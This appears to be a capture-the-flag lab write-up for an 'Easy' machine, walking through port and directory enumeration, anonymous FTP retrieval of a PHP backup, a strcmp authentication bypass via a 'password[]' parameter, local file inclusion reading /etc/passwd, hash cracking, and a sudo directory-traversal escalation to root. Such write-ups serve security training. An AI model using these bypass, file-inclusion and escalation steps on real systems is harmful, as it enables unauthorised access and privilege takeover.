RATING
Easy
ENUMERATION
As usual, we start it off with our nmap scan:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.164.101
Navigating to the target in our browser, we don’t really find anything of interest. We proceed with a directory bruteforce using feroxbuster and discover /adnin“
Command: feroxbuster -u http://192.168.164.101/ -w /usr/share/wordlists/dirb/common.txt -k --quiet
Navigating to http://192.168.164.101/admin, we find a login page. We try some defaults with no success. With no valid credentials, we move on:
We know from our nmap scans that anonymous FTP access is allowed on port 2112 and we know that there are 2 files that we can access, index.php.bak and welcome.msg. We download these locally to examine:
Command: ftp [email protected] 2112
Command: mget index.php.bak
Command: mget welcome.msg
The welcome.msg file provides nothing of interest, but examining index.php.bak, we find something useful. A bit of research reveals that the strcmp function allows for authentication bypass:
EXPLOITATION
We navigate over to our login page and enter user admin and password password and capture the request with burp:
We modify the intercepted request and modify the password parameter with password[]=””:
Forwarding this to the server, we are able to bypass authentication and log in:
Navigating to the dashboard, we see some menu options:
We head over to logs and see a few log entries. We can select a log file and view it:
Using burp, we intercept the request to view the log entry:
We can modify this request to perform a Local File Inclusion (LFI) and read the contents of /etc/passwd:
We then use john to crack the password for webadmin:
Command: john --wordlist=rockyou.txt hash.txt
With our cracked password dragon, we are able to SSH to our target as user webadmin:
PRIVILEGE ESCALATION
We check for sudo privileges and see that webadmin can run the files in /notes using the /bin/nice:
Command: sudo -l
However, we are not able to write to the /notes directory:
We can, however, bypass this using some directory traversal. We create a shell script in /home/webadmin and execute it using the following path:
Command: echo "/bin/bash" > exploit.sh
Command: chmod +x exploit.sh
Command: sudo /bin/nice /notes/../home/webadmin/exploit.sh
With this, we have a shell as root and can read our proof.txt.